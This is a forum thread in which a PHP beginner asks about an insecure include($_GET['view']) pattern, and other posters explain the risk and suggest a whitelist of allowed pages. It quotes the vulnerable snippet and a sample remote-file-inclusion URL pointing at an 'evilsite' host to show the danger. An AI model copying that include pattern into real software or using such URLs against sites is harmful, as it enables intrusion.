Help please with includes

[BizzyLizzy]

Hi there.

Hope someone can help a complete php newbie.

currently our website has the following code. Very simple and I believe pretty insecure. (our hosters have register globals on).

<?php
$view = $_GET['view'];
?>

then

<?php include ("$view.php"); ?>

then in the links section of the navigation bar.

index.php?view=home
index.php?view=aboutus

etc etc (there are about 10 pages in all

The problem with this is that the resultant URL is shown as

http://www.mysite.com/index.php?view=home

Now correct me if I am wrong but isnt this terribly insecure? (I didnt write this by the way I inherited it.).

I have been told that using $_POST would be a better way but I am not sure how I go about changing things. Ideally I would like to have the url just shown as

http://www.mysite.com/index.php

Am I making any sense here? Hopefully one of you clever people can give me some assistance.

Many thanks

Lizzy

 

[thedaver]

$_GET or $_POST are approximately the same level of risk here. Both can be readily manipulated by the client.

You are at fairly high levels of risk using this approach to inclusion.

Consider:

http://www.mysite.com/index.php?view=http://www.evilsite.com/showpasswordfile.php

D.E.R. Management - IT Project Management Consulting

http://www.dermanagement.com/

 

[AdaHacker]

As a rule of thumb, you should never blindly trust anything comming from the client. That includes $_GET, $_POST, $_REQUEST, and $_COOKIES.

If you're going to use an approach like this, you should validate the view parameter. One way to do it would be to use a list of valid pages. For example:

$view = $_GET['view'];
$good_pages = array('home', 'aboutus', 'whatever');
if (in_array($view, $good_pages)) {
    include("$view.php");
} else {
    die("Invalid page");
}

 

[BizzyLizzy]

Brilliant OK, thats sounds as though its going to be a bit more secure.

Presumably I should validate all my variables throughout the site as well - due to the fact that the hosters have global variables switched on.

I have just been going through the rest of the site and notice that there are an awful lot of variables are not set by default.

Anyway I will set the allowable pages in the index page and see how I go from there.

Lizzy

 

[jpadie]

if your host has register globals turned on, either turn it off locally or move hosts.i would not trust an ISP to manage my data if it blindly ignored the advice of the writers of one of the core web applications. worse still would be if the host had considered the risks, read the advice and then still turned register-globals on. that would just be ignorant but reckless.